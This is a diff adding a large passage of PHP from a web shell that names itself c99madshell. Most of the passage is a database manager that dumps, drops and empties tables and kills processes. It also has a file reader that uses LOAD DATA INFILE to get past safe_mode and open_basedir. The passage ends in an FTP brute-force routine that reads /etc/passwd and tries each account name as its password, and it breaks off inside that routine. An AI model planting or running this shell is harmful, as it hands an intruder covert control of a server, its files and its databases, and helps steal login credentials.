+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='structure';document.sql.submit();\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='browse';document.sql.submit();\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_act.value='tbldump';document.sql.thistbl.value='1';document.sql.submit();\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='insert';document.sql.thistbl.value='1';document.sql.submit();\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $sql_query = urldecode($sql_query);
+        $sql_tbl_insert_q = urldecode($sql_tbl_insert_q);
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><input type=hidden name='sql_tbl_act' value='insert'><input type=hidden name='sql_tbl_insert_q' value='".urlencode($sql_tbl_insert_q)."'><input type=hidden name='sql_tbl_ls' value='".$sql_tbl_ls."'><input type=hidden name='sql_tbl_le' value='".$sql_tbl_le."'><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.thistbl.value='1';document.sql.sql_order.value='".htmlspecialchars($sql_order)."';document.sql.sql_tbl_ls.value='".($i*$perpage)."';document.sql.sql_tbl_le.value='".($i*$perpage+$perpage)."';document.sql.submit();\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {$sql_order="";$sql_order=$e[0]." ".$v;echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_order.value='".$sql_order."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b> <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_order.value='".$s."%20".$v."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><font color=red>\/</font></a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>DEL</b></a>&nbsp;";
+       echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl_act.value='insert';document.sql.sql_tbl_insert_q.value='".urlencode($w)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>EDIT</b></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><input name='act' type='hidden' value='sql'><input name='sql_login' type='hidden' value='".$sql_login."'><input name='sql_server' type='hidden' value='".$sql_server."'><input name='sql_port' type='hidden' value='".$sql_port."'><input name='sql_db' type='hidden' value='".$sql_db."'><input name='sql_passwd' type='hidden' value='".$sql_passwd."'><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+
+       echo "<td>&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($row["Name"])."';document.sql.submit();\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+
+       echo "<td>&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DELETE FROM `".$row["Name"]."`")."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>EMPT</b></a>&nbsp;&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DROP TABLE `".$row["Name"]."`")."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>DROP</b></a>&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_tbl.value='".$row["Name"]."';document.sql.sql_tbl_act.value='insert';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>INS</b></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>»</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='processes';document.sql.kill.value='".$row[0]."';document.sql.submit();\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (isset($_POST['fqb_lenght'])) $fqb_lenght = $_POST['fqb_lenght'];
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if (isset($_POST['fqb_logging'])) $fqb_logging = $_POST['fqb_logging'];
+    if ($fqb_logging)
+    {
+     if (isset($_POST['fqb_logfile'])) $fqb_logging = $_POST['fqb_logfile'];
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c99madshell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
